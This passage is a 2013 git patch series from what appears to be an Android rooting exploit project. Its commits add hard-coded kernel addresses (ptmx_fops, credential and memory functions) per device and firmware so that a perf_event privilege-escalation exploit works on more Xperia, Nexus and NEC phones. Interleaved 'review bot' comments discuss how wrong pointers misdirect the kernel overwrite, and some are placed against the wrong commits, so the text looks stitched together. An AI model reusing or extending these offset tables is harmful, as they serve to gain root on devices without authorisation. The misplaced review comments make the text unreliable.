@@ -45,6 +45,7 @@ static supported_device supported_devices[] = { { DEVICE_LG_E975_V10e, 0xc0f9da70 }, { DEVICE_LT26W_6_2_B_0_200, 0xc0cc3dc0 }, { DEVICE_LT26I_6_2_B_0_211, 0xc0cc37e8 }, + { DEVICE_LT26II_6_2_B_0_211, 0xc0cc37e8 }, { DEVICE_C6603_10_1_1_A_1_307, 0xc0d37488 }, { DEVICE_C6602_10_1_1_A_1_307, 0xc0d37488 }, { DEVICE_C6603_10_1_1_A_1_253, 0xc0d37488 }, From 061dce30656ba47ab899eee5629e0d076cb12ac5 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Mon, 24 Jun 2013 03:57:44 +0530 Subject: [PATCH 019/125] added support for Xperia Acros S (LT26w) 6.2.B.0.211 --- cred.c | 1 + device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 1 + ptmx.c | 1 + 5 files changed, 5 insertions(+), 2 deletions(-) diff --git a/cred.c b/cred.c index a640e60..84b47bb 100644 --- a/cred.c +++ b/cred.c @@ -44,6 +44,7 @@ static supported_device supported_devices[] = { { DEVICE_HTX21_1_20_971_1, 0xc00a6e54, 0xc00a6940 }, { DEVICE_LG_E975_V10e, 0xc00a0f90, 0xc00a0b6c }, { DEVICE_LT26W_6_2_B_0_200, 0xc00b261c, 0xc00b2140 }, + { DEVICE_LT26W_6_2_B_0_211, 0xc00b262c, 0xc00b2150 }, { DEVICE_LT26I_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, { DEVICE_LT26II_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, { DEVICE_C6603_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, diff --git a/device_database b/device_database index 8f02c42..1278dbc 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 8f02c42541e29787277e879b33b937662e617b72 +Subproject commit 1278dbc2b7cea92b9777d3bd709de92abbba6448 diff --git a/libperf_event_exploit b/libperf_event_exploit index ca9e38a..1ca8c62 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit ca9e38aededa7bfd41a6b28671330117607d0a88 +Subproject commit 1ca8c62c577b1b9d105cfa8d8e1a07e4ba2b5bcc diff --git a/mm.c b/mm.c index b695c0c..6ceb298 100644 --- a/mm.c +++ b/mm.c 
@@ -30,6 +30,7 @@ static supported_device supported_devices[] = { { DEVICE_HTX21_1_20_971_1, 0xc00fa8b0 }, { DEVICE_LG_E975_V10e, 0xc0116598 }, { DEVICE_LT26W_6_2_B_0_200, 0xc0136294 }, + { DEVICE_LT26W_6_2_B_0_211, 0xc01362a4 }, { DEVICE_LT26I_6_2_B_0_211, 0xc0135650 }, { DEVICE_LT26II_6_2_B_0_211, 0xc0135650 }, { DEVICE_C6603_10_1_1_A_1_307, 0xc0109894 }, diff --git a/ptmx.c b/ptmx.c index 9745a9c..b17ff91 100644 --- a/ptmx.c +++ b/ptmx.c @@ -44,6 +44,7 @@ static supported_device supported_devices[] = { { DEVICE_HTX21_1_20_971_1, 0xc0ccc0b4 }, { DEVICE_LG_E975_V10e, 0xc0f9da70 }, { DEVICE_LT26W_6_2_B_0_200, 0xc0cc3dc0 }, + { DEVICE_LT26W_6_2_B_0_211, 0xc0b86ef0 }, { DEVICE_LT26I_6_2_B_0_211, 0xc0cc37e8 }, { DEVICE_LT26II_6_2_B_0_211, 0xc0cc37e8 }, { DEVICE_C6603_10_1_1_A_1_307, 0xc0d37488 }, From 2cdd56875d1e5923a72b2eb1cc543cb859557746 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Mon, 24 Jun 2013 04:00:53 +0530 Subject: [PATCH 020/125] added support for Xperia P (LT22i) 6.2.A.1.100 (thanks to the_laser) --- cred.c | 1 + device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 1 + ptmx.c | 1 + 5 files changed, 5 insertions(+), 2 deletions(-) diff --git a/cred.c b/cred.c index 84b47bb..03347a2 100644 --- a/cred.c +++ b/cred.c @@ -47,6 +47,7 @@ static supported_device supported_devices[] = { { DEVICE_LT26W_6_2_B_0_211, 0xc00b262c, 0xc00b2150 }, { DEVICE_LT26I_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, { DEVICE_LT26II_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, + { DEVICE_LT22I_6_2_A_1_100 , 0xc00c37c8 ,0xc00c33f8}, { DEVICE_C6603_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, { DEVICE_C6602_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, { DEVICE_C6603_10_1_1_A_1_253, 0xc0093dd4, 0xc00938f8 }, diff --git a/device_database b/device_database index 1278dbc..58124a2 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 1278dbc2b7cea92b9777d3bd709de92abbba6448 +Subproject commit 58124a2c162664843bcbb86cd164219ed0089a2c 
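Review bot: The ptmx_fops address for `DEVICE_LT26W_6_2_B_0_211` (0xc0b86ef0) sits roughly 0x13d000 below the .200 row for the same device (0xc0cc3dc0) and the LT26I .211 row (0xc0cc37e8), yet the cred.c and mm.c addresses added for the same build differ from .200 by only 0x10. That is not impossible, but such a small text shift paired with a large data shift suggests a typo or a value taken from a different image; suggest verifying it against the LT26W .211 kernel symbols before merging, because a wrong ptmx_fops pointer sends the fsync overwrite to an arbitrary kernel address.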
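Review bot: The new cred.c row `{ DEVICE_LT22I_6_2_A_1_100 , 0xc00c37c8 ,0xc00c33f8}` puts spaces before its commas and none after the second comma or before the closing brace, unlike every other row of the table; write it as `{ DEVICE_LT22I_6_2_A_1_100, 0xc00c37c8, 0xc00c33f8 },`. The mm.c and ptmx.c rows added by the same patch already follow the table's spacing.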
diff --git a/libperf_event_exploit b/libperf_event_exploit index 1ca8c62..4666b41 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 1ca8c62c577b1b9d105cfa8d8e1a07e4ba2b5bcc +Subproject commit 4666b4184f330b0437e017a6bd168f9f84ac2b40 diff --git a/mm.c b/mm.c index 6ceb298..4baddc2 100644 --- a/mm.c +++ b/mm.c @@ -33,6 +33,7 @@ static supported_device supported_devices[] = { { DEVICE_LT26W_6_2_B_0_211, 0xc01362a4 }, { DEVICE_LT26I_6_2_B_0_211, 0xc0135650 }, { DEVICE_LT26II_6_2_B_0_211, 0xc0135650 }, + { DEVICE_LT22I_6_2_A_1_100, 0xc0136358 }, { DEVICE_C6603_10_1_1_A_1_307, 0xc0109894 }, { DEVICE_C6602_10_1_1_A_1_307, 0xc0109894 }, { DEVICE_C6603_10_1_1_A_1_253, 0xc0109894 }, diff --git a/ptmx.c b/ptmx.c index b17ff91..10ac620 100644 --- a/ptmx.c +++ b/ptmx.c @@ -47,6 +47,7 @@ static supported_device supported_devices[] = { { DEVICE_LT26W_6_2_B_0_211, 0xc0b86ef0 }, { DEVICE_LT26I_6_2_B_0_211, 0xc0cc37e8 }, { DEVICE_LT26II_6_2_B_0_211, 0xc0cc37e8 }, + { DEVICE_LT22I_6_2_A_1_100, 0xc09dbed8 }, { DEVICE_C6603_10_1_1_A_1_307, 0xc0d37488 }, { DEVICE_C6602_10_1_1_A_1_307, 0xc0d37488 }, { DEVICE_C6603_10_1_1_A_1_253, 0xc0d37488 }, From a0b679df233015783f5a4de8d2284ba990a6ef7d Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Mon, 24 Jun 2013 04:02:17 +0530 Subject: [PATCH 021/125] added support for Xperia Go (ST27i/a) 6.2.A.1.100 (thanks to the_laser) --- cred.c | 2 ++ device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 2 ++ ptmx.c | 2 ++ 5 files changed, 8 insertions(+), 2 deletions(-) diff --git a/cred.c b/cred.c index 03347a2..d897035 100644 --- a/cred.c +++ b/cred.c 
@@ -48,6 +48,8 @@ static supported_device supported_devices[] = { { DEVICE_LT26I_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, { DEVICE_LT26II_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, { DEVICE_LT22I_6_2_A_1_100 , 0xc00c37c8 ,0xc00c33f8}, + { DEVICE_ST27I_6_2_A_1_100, 0xc00c314c, 0xc00c2d7c}, + { DEVICE_ST27A_6_2_A_1_100, 0xc00c314c, 0xc00c2d7c}, { DEVICE_C6603_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, { DEVICE_C6602_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, { DEVICE_C6603_10_1_1_A_1_253, 0xc0093dd4, 0xc00938f8 }, diff --git a/device_database b/device_database index 58124a2..8639a32 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 58124a2c162664843bcbb86cd164219ed0089a2c +Subproject commit 8639a32be211430df30d12aee11390b3fd1c12f9 diff --git a/libperf_event_exploit b/libperf_event_exploit index 4666b41..7392ed2 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 4666b4184f330b0437e017a6bd168f9f84ac2b40 +Subproject commit 7392ed204145cf014e6f0e9c86426657a3afe4e3 diff --git a/mm.c b/mm.c index 4baddc2..45f87dd 100644 --- a/mm.c +++ b/mm.c @@ -34,6 +34,8 @@ static supported_device supported_devices[] = { { DEVICE_LT26I_6_2_B_0_211, 0xc0135650 }, { DEVICE_LT26II_6_2_B_0_211, 0xc0135650 }, { DEVICE_LT22I_6_2_A_1_100, 0xc0136358 }, + { DEVICE_ST27I_6_2_A_1_100, 0xc01366ec}, + { DEVICE_ST27A_6_2_A_1_100, 0xc01366ec}, { DEVICE_C6603_10_1_1_A_1_307, 0xc0109894 }, { DEVICE_C6602_10_1_1_A_1_307, 0xc0109894 }, { DEVICE_C6603_10_1_1_A_1_253, 0xc0109894 }, diff --git a/ptmx.c b/ptmx.c index 10ac620..1ffb6b0 100644 --- a/ptmx.c +++ b/ptmx.c 
@@ -48,6 +48,8 @@ static supported_device supported_devices[] = { { DEVICE_LT26I_6_2_B_0_211, 0xc0cc37e8 }, { DEVICE_LT26II_6_2_B_0_211, 0xc0cc37e8 }, { DEVICE_LT22I_6_2_A_1_100, 0xc09dbed8 }, + { DEVICE_ST27I_6_2_A_1_100, 0xc09b98e0}, + { DEVICE_ST27A_6_2_A_1_100, 0xc09b98e0}, { DEVICE_C6603_10_1_1_A_1_307, 0xc0d37488 }, { DEVICE_C6602_10_1_1_A_1_307, 0xc0d37488 }, { DEVICE_C6603_10_1_1_A_1_253, 0xc0d37488 }, From bb9cf0c5bd9ab91679340a606230aa19d43fe985 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Mon, 24 Jun 2013 04:04:07 +0530 Subject: [PATCH 022/125] added support for Xperia T (LT30p) 9.1.A.1.142 (thanks to the_laser) --- cred.c | 1 + device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 1 + ptmx.c | 1 + 5 files changed, 5 insertions(+), 2 deletions(-) diff --git a/cred.c b/cred.c index d897035..62e7b02 100644 --- a/cred.c +++ b/cred.c @@ -61,6 +61,7 @@ static supported_device supported_devices[] = { { DEVICE_C6502_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, { DEVICE_C6506_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, { DEVICE_LT30P_9_1_A_1_141, 0xc0094878, 0xc009439c }, + { DEVICE_LT30P_9_1_A_1_142, 0xc0094878, 0xc009439c}, { DEVICE_LT29I_9_1_B_0_411, 0xc0095dec, 0xc0095910 }, { DEVICE_LT29I_9_1_B_1_67, 0xc0095ca4, 0xc00957c8 }, { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc }, diff --git a/device_database b/device_database index 8639a32..4782d2f 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 8639a32be211430df30d12aee11390b3fd1c12f9 +Subproject commit 4782d2f33aceb73feaeeae69bfcf1b10101cee88 diff --git a/libperf_event_exploit b/libperf_event_exploit index 7392ed2..1499dff 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 7392ed204145cf014e6f0e9c86426657a3afe4e3 +Subproject commit 1499dff24dddea8036d757a60f7bd707e50afb3f diff --git a/mm.c b/mm.c index 45f87dd..5f6a477 100644 --- a/mm.c +++ b/mm.c 
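Review bot: Both new rows end in `0xc09b98e0}` with no space before the closing brace, unlike the surrounding rows; write them as `{ DEVICE_ST27I_6_2_A_1_100, 0xc09b98e0 },` and `{ DEVICE_ST27A_6_2_A_1_100, 0xc09b98e0 },`. The cred.c and mm.c rows added by this patch have the same spacing slip.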
@@ -47,6 +47,7 @@ static supported_device supported_devices[] = { { DEVICE_C6502_10_3_A_0_423, 0xc0112668 }, { DEVICE_C6506_10_3_A_0_423, 0xc0112668 }, { DEVICE_LT30P_9_1_A_1_141, 0xc01096e4 }, + { DEVICE_LT30P_9_1_A_1_142, 0xc01096e4 }, { DEVICE_LT29I_9_1_B_0_411, 0xc010ac30 }, { DEVICE_LT29I_9_1_B_1_67, 0xc010aaec }, { DEVICE_N05E_A1000311, 0xc0105800 }, diff --git a/ptmx.c b/ptmx.c index 1ffb6b0..0b74f5c 100644 --- a/ptmx.c +++ b/ptmx.c @@ -61,6 +61,7 @@ static supported_device supported_devices[] = { { DEVICE_C6502_10_3_A_0_423, 0xc0e46ce0 }, { DEVICE_C6506_10_3_A_0_423, 0xc0e46ce0 }, { DEVICE_LT30P_9_1_A_1_141, 0xc0d02b00}, + { DEVICE_LT30P_9_1_A_1_142, 0xc0d02b00}, { DEVICE_LT29I_9_1_B_0_411, 0xc0d01f60 }, { DEVICE_LT29I_9_1_B_1_67, 0xc0d01f60 }, { DEVICE_N05E_A1000311, 0xc0f58700 }, From f3ca25a1d98581bee1a7c1378525742a9b8c1822 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Mon, 24 Jun 2013 04:06:05 +0530 Subject: [PATCH 023/125] added support for Xperia V (LT25i) 9.1.A.1.140/142 (thanks to the_laser) --- cred.c | 2 ++ device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 2 ++ ptmx.c | 2 ++ 5 files changed, 8 insertions(+), 2 deletions(-) diff --git a/cred.c b/cred.c index 62e7b02..97687a4 100644 --- a/cred.c +++ b/cred.c @@ -64,6 +64,8 @@ static supported_device supported_devices[] = { { DEVICE_LT30P_9_1_A_1_142, 0xc0094878, 0xc009439c}, { DEVICE_LT29I_9_1_B_0_411, 0xc0095dec, 0xc0095910 }, { DEVICE_LT29I_9_1_B_1_67, 0xc0095ca4, 0xc00957c8 }, + { DEVICE_LT25I_9_1_A_1_140, 0xc0097f20, 0xc0097a44}, + { DEVICE_LT25I_9_1_A_1_142, 0xc0097dd8, 0xc00978fc}, { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc }, }; diff --git a/device_database b/device_database index 4782d2f..53ac4e7 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 4782d2f33aceb73feaeeae69bfcf1b10101cee88 +Subproject commit 53ac4e717dd152b267b50247453642b4c6dad472 diff --git a/libperf_event_exploit b/libperf_event_exploit index 1499dff..48ed253 160000 
--- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 1499dff24dddea8036d757a60f7bd707e50afb3f +Subproject commit 48ed25347f6c8deca07e5a3a7410593fc52b62f0 diff --git a/mm.c b/mm.c index 5f6a477..758eb03 100644 --- a/mm.c +++ b/mm.c @@ -50,6 +50,8 @@ static supported_device supported_devices[] = { { DEVICE_LT30P_9_1_A_1_142, 0xc01096e4 }, { DEVICE_LT29I_9_1_B_0_411, 0xc010ac30 }, { DEVICE_LT29I_9_1_B_1_67, 0xc010aaec }, + { DEVICE_LT25I_9_1_A_1_140, 0xc010dcfc}, + { DEVICE_LT25I_9_1_A_1_142, 0xc010dbb4}, { DEVICE_N05E_A1000311, 0xc0105800 }, }; diff --git a/ptmx.c b/ptmx.c index 0b74f5c..a743a07 100644 --- a/ptmx.c +++ b/ptmx.c @@ -64,6 +64,8 @@ static supported_device supported_devices[] = { { DEVICE_LT30P_9_1_A_1_142, 0xc0d02b00}, { DEVICE_LT29I_9_1_B_0_411, 0xc0d01f60 }, { DEVICE_LT29I_9_1_B_1_67, 0xc0d01f60 }, + { DEVICE_LT25I_9_1_A_1_140, 0xc0d032f8}, + { DEVICE_LT25I_9_1_A_1_142, 0xc0d032b8}, { DEVICE_N05E_A1000311, 0xc0f58700 }, }; From 1f95f45ae8c21825b4afeeebc840ff960356d7ee Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Mon, 24 Jun 2013 04:08:10 +0530 Subject: [PATCH 024/125] added support for Google Nexus 4 (JDQ39) --- cred.c | 1 + device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 1 + ptmx.c | 1 + 5 files changed, 5 insertions(+), 2 deletions(-) diff --git a/cred.c b/cred.c index 97687a4..682f69f 100644 --- a/cred.c +++ b/cred.c @@ -67,6 +67,7 @@ static supported_device supported_devices[] = { { DEVICE_LT25I_9_1_A_1_140, 0xc0097f20, 0xc0097a44}, { DEVICE_LT25I_9_1_A_1_142, 0xc0097dd8, 0xc00978fc}, { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc }, + { DEVICE_NEXUS4_JDQ39, 0xc0089990, 0xc0089678 } }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); diff --git a/device_database b/device_database index 53ac4e7..7eccb14 160000 --- a/device_database +++ b/device_database 
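Review bot: The new last row `{ DEVICE_NEXUS4_JDQ39, 0xc0089990, 0xc0089678 }` drops the trailing comma that every other row of the cred.c table carries, so the next device appended after it has to edit this line as well instead of adding one. C allows a trailing comma in an initializer list; keep it as `{ DEVICE_NEXUS4_JDQ39, 0xc0089990, 0xc0089678 },` so appends stay one-line patches.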
@@ -1 +1 @@ -Subproject commit 53ac4e717dd152b267b50247453642b4c6dad472 +Subproject commit 7eccb1438d7165f9900b076291a3154bf3f63f0c diff --git a/libperf_event_exploit b/libperf_event_exploit index 48ed253..11a0b02 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 48ed25347f6c8deca07e5a3a7410593fc52b62f0 +Subproject commit 11a0b027c3ce515901861fc57e194e8eab11ebea diff --git a/mm.c b/mm.c index 758eb03..b060843 100644 --- a/mm.c +++ b/mm.c @@ -53,6 +53,7 @@ static supported_device supported_devices[] = { { DEVICE_LT25I_9_1_A_1_140, 0xc010dcfc}, { DEVICE_LT25I_9_1_A_1_142, 0xc010dbb4}, { DEVICE_N05E_A1000311, 0xc0105800 }, + { DEVICE_NEXUS4_JDQ39, 0xc00f8114 } }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); diff --git a/ptmx.c b/ptmx.c index a743a07..69f475d 100644 --- a/ptmx.c +++ b/ptmx.c @@ -67,6 +67,7 @@ static supported_device supported_devices[] = { { DEVICE_LT25I_9_1_A_1_140, 0xc0d032f8}, { DEVICE_LT25I_9_1_A_1_142, 0xc0d032b8}, { DEVICE_N05E_A1000311, 0xc0f58700 }, + { DEVICE_NEXUS4_JDQ39, 0xc0ef72f0 }, }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); From 5102e7a437184b1305a1b5fbe2c05c42fca21ffd Mon Sep 17 00:00:00 2001 From: fi01 Date: Mon, 24 Jun 2013 13:41:01 +0900 Subject: [PATCH 025/125] Added SOL21 9.0.F.0.226 --- device_database | 2 +- libperf_event_exploit | 2 +- ptmx.c | 1 + 3 files changed, 3 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 7eccb14..07b7e55 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 7eccb1438d7165f9900b076291a3154bf3f63f0c +Subproject commit 07b7e558c1dfbe67b093d5147971fa1dc820534f diff --git a/libperf_event_exploit b/libperf_event_exploit index 11a0b02..d6854cd 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit 
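Review bot: The mm.c row `{ DEVICE_NEXUS4_JDQ39, 0xc00f8114 }` is appended as the last entry without the trailing comma the rest of the table uses, so any later addition must modify this line too; write it as `{ DEVICE_NEXUS4_JDQ39, 0xc00f8114 },`. The ptmx.c row in the same patch already keeps the comma.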
@@ -1 +1 @@ -Subproject commit 11a0b027c3ce515901861fc57e194e8eab11ebea +Subproject commit d6854cd45911ac5e996c056df7a669d37ecfd135 diff --git a/ptmx.c b/ptmx.c index 69f475d..621f8c8 100644 --- a/ptmx.c +++ b/ptmx.c @@ -37,6 +37,7 @@ static supported_device supported_devices[] = { { DEVICE_SO04D_7_0_D_1_137, 0xc0c9d8a0 }, { DEVICE_SO04E_10_1_1_D_0_179, 0xc0f392d8 }, { DEVICE_SOL22_10_2_F_3_43, 0xc0e389b0 }, + { DEVICE_SOL21_9_0_F_0_226, 0xc0cffe78 }, { DEVICE_SOL21_9_1_D_0_395, 0xc0d030c8 }, { DEVICE_HTL21_1_29_970_1, 0xc0d1d944 }, { DEVICE_HTL22_1_05_970_1, 0xc0df467c }, From 13600ca1908a11d5389a600e1d51e176899cabc6 Mon Sep 17 00:00:00 2001 From: cofface Date: Mon, 24 Jun 2013 14:43:51 +0800 Subject: [PATCH 026/125] added support for Galaxy Nexus (JOP40C) added support for Galaxy Nexus (JOP40C) --- mm.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/mm.c b/mm.c index b060843..1b11e15 100644 --- a/mm.c +++ b/mm.c @@ -53,7 +53,8 @@ static supported_device supported_devices[] = { { DEVICE_LT25I_9_1_A_1_140, 0xc010dcfc}, { DEVICE_LT25I_9_1_A_1_142, 0xc010dbb4}, { DEVICE_N05E_A1000311, 0xc0105800 }, - { DEVICE_NEXUS4_JDQ39, 0xc00f8114 } + { DEVICE_NEXUS4_JDQ39, 0xc00f8114 }, + { DEVICE_NEXUS_JOP40C, 0xc01350b0 } }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); From e8fa4d306932c28978dfa717bd17f87169466b8a Mon Sep 17 00:00:00 2001 From: cofface Date: Mon, 24 Jun 2013 14:44:35 +0800 Subject: [PATCH 027/125] added support for Galaxy Nexus (JOP40C) added support for Galaxy Nexus (JOP40C) --- cred.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cred.c b/cred.c index 682f69f..77ff8f1 100644 --- a/cred.c +++ b/cred.c 
@@ -67,7 +67,8 @@ static supported_device supported_devices[] = { { DEVICE_LT25I_9_1_A_1_140, 0xc0097f20, 0xc0097a44}, { DEVICE_LT25I_9_1_A_1_142, 0xc0097dd8, 0xc00978fc}, { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc }, - { DEVICE_NEXUS4_JDQ39, 0xc0089990, 0xc0089678 } + { DEVICE_NEXUS4_JDQ39, 0xc0089990, 0xc0089678 }, + { DEVICE_NEXUS_JOP40C, 0xc00cdef0, 0xc00cdbb8 } }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); From 499ed9bfca77f3198d902ca5fd2c09da1cb1b8f8 Mon Sep 17 00:00:00 2001 From: cofface Date: Mon, 24 Jun 2013 15:06:35 +0800 Subject: [PATCH 028/125] add support Galaxy Nexus JOP40C add support Galaxy Nexus JOP40C --- ptmx.c | 1 + 1 file changed, 1 insertion(+) diff --git a/ptmx.c b/ptmx.c index 621f8c8..9ed9ab4 100644 --- a/ptmx.c +++ b/ptmx.c @@ -69,6 +69,7 @@ static supported_device supported_devices[] = { { DEVICE_LT25I_9_1_A_1_142, 0xc0d032b8}, { DEVICE_N05E_A1000311, 0xc0f58700 }, { DEVICE_NEXUS4_JDQ39, 0xc0ef72f0 }, + { DEVICE_NEXUS_JOP40C, 0xc08b5344 }, }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); From c0ad3c4b156b0fcad16048df6a5599a668a38abf Mon Sep 17 00:00:00 2001 From: sj8023ld Date: Mon, 24 Jun 2013 17:17:12 +0800 Subject: [PATCH 029/125] Add C5303 12.0.1.1.257 --- cred.c | 3 +++ mm.c | 3 +++ ptmx.c | 3 +++ 3 files changed, 9 insertions(+) diff --git a/cred.c b/cred.c index 77ff8f1..fad5bdc 100644 --- a/cred.c +++ b/cred.c 
@@ -57,6 +57,9 @@ static supported_device supported_devices[] = { { DEVICE_C5302_12_0_A_1_284, 0xc009ec08, 0xc009e72c }, { DEVICE_C5303_12_0_A_1_284, 0xc009ec08, 0xc009e72c }, { DEVICE_C5306_12_0_A_1_284, 0xc009ec08, 0xc009e72c }, + { DEVICE_C5303_12_0_A_1_257, 0xc009ec08, 0xc009e72c }, + { DEVICE_C5302_12_0_A_1_257, 0xc009ec08, 0xc009e72c }, + { DEVICE_M35H_12_0_A_1_257, 0xc009ec08, 0xc009e72c }, { DEVICE_C6503_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, { DEVICE_C6502_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, { DEVICE_C6506_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, diff --git a/mm.c b/mm.c index 1b11e15..24f21c9 100644 --- a/mm.c +++ b/mm.c @@ -43,6 +43,9 @@ static supported_device supported_devices[] = { { DEVICE_C5302_12_0_A_1_284, 0xc011445c }, { DEVICE_C5303_12_0_A_1_284, 0xc011445c }, { DEVICE_C5306_12_0_A_1_284, 0xc011445c }, + { DEVICE_C5303_12_0_A_1_257, 0xc011445c }, + { DEVICE_C5302_12_0_A_1_257, 0xc011445c }, + { DEVICE_M35H_12_0_A_1_257, 0xc011445c }, { DEVICE_C6503_10_3_A_0_423, 0xc0112668 }, { DEVICE_C6502_10_3_A_0_423, 0xc0112668 }, { DEVICE_C6506_10_3_A_0_423, 0xc0112668 }, diff --git a/ptmx.c b/ptmx.c index 9ed9ab4..74aebfe 100644 --- a/ptmx.c +++ b/ptmx.c @@ -58,6 +58,9 @@ static supported_device supported_devices[] = { { DEVICE_C5302_12_0_A_1_284, 0xc0e3bed8 }, { DEVICE_C5303_12_0_A_1_284, 0xc0e3bed8 }, { DEVICE_C5306_12_0_A_1_284, 0xc0e3bed8 }, + { DEVICE_C5303_12_0_A_1_257, 0xc0e3b890 }, + { DEVICE_C5302_12_0_A_1_257, 0xc0e3b890 }, + { DEVICE_M35H_12_0_A_1_257, 0xc0e3b890 }, { DEVICE_C6503_10_3_A_0_423, 0xc0e46ce0 }, { DEVICE_C6502_10_3_A_0_423, 0xc0e46ce0 }, { DEVICE_C6506_10_3_A_0_423, 0xc0e46ce0 }, From 2227043b5bfd4c5d48562407545a2ff89ffcef4c Mon Sep 17 00:00:00 2001 From: Stormtrooper MX Date: Mon, 24 Jun 2013 17:35:03 -0500 Subject: [PATCH 030/125] add nec-101t add support for nec-101t --- cred.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cred.c b/cred.c index fad5bdc..d3a5ff5 100644 --- a/cred.c +++ b/cred.c 
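Review bot: The three 12.0.A.1.257 rows reuse the .284 addresses verbatim in cred.c and mm.c but get a different ptmx_fops address here (0xc0e3b890 versus 0xc0e3bed8 for .284). A kernel whose text symbols are unchanged usually keeps the same data layout as well, so either .257 really differs only in data placement or one of the two tables was copied rather than measured; worth confirming all three values against the .257 symbol table. The commit subject also says 12.0.1.1.257 while the identifiers read 12_0_A_1_257 — one of the two is likely a typo.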
@@ -71,7 +71,8 @@ static supported_device supported_devices[] = { { DEVICE_LT25I_9_1_A_1_142, 0xc0097dd8, 0xc00978fc}, { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc }, { DEVICE_NEXUS4_JDQ39, 0xc0089990, 0xc0089678 }, - { DEVICE_NEXUS_JOP40C, 0xc00cdef0, 0xc00cdbb8 } + { DEVICE_NEXUS_JOP40C, 0xc00cdef0, 0xc00cdbb8 }, + { DEVICE_NEC_101T, 0xc00fa134, 0xc00fa28c } }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); From ad9c1bf615a7d5c95eaebd65f9eeefde9a3eb1b0 Mon Sep 17 00:00:00 2001 From: Stormtrooper MX Date: Mon, 24 Jun 2013 17:35:50 -0500 Subject: [PATCH 031/125] add nec-101t add support for nec-101t --- mm.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/mm.c b/mm.c index 24f21c9..5d9ddd0 100644 --- a/mm.c +++ b/mm.c @@ -57,7 +57,8 @@ static supported_device supported_devices[] = { { DEVICE_LT25I_9_1_A_1_142, 0xc010dbb4}, { DEVICE_N05E_A1000311, 0xc0105800 }, { DEVICE_NEXUS4_JDQ39, 0xc00f8114 }, - { DEVICE_NEXUS_JOP40C, 0xc01350b0 } + { DEVICE_NEXUS_JOP40C, 0xc01350b0 }, + { DEVICE_NEC_101T, 0xc013cccc } }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); From f382304e6c0142da345ca8ca834720584acea8e7 Mon Sep 17 00:00:00 2001 From: Stormtrooper MX Date: Mon, 24 Jun 2013 17:36:39 -0500 Subject: [PATCH 032/125] add nec-101t add support for nec-101t --- ptmx.c | 1 + 1 file changed, 1 insertion(+) diff --git a/ptmx.c b/ptmx.c index 74aebfe..569b611 100644 --- a/ptmx.c +++ b/ptmx.c @@ -73,6 +73,7 @@ static supported_device supported_devices[] = { { DEVICE_N05E_A1000311, 0xc0f58700 }, { DEVICE_NEXUS4_JDQ39, 0xc0ef72f0 }, { DEVICE_NEXUS_JOP40C, 0xc08b5344 }, + { DEVICE_NEC_101T, 0xc02c6da8 }, }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); From d2c142cf25302ab8d878bbaf99b0802780ac1671 Mon Sep 17 00:00:00 2001 
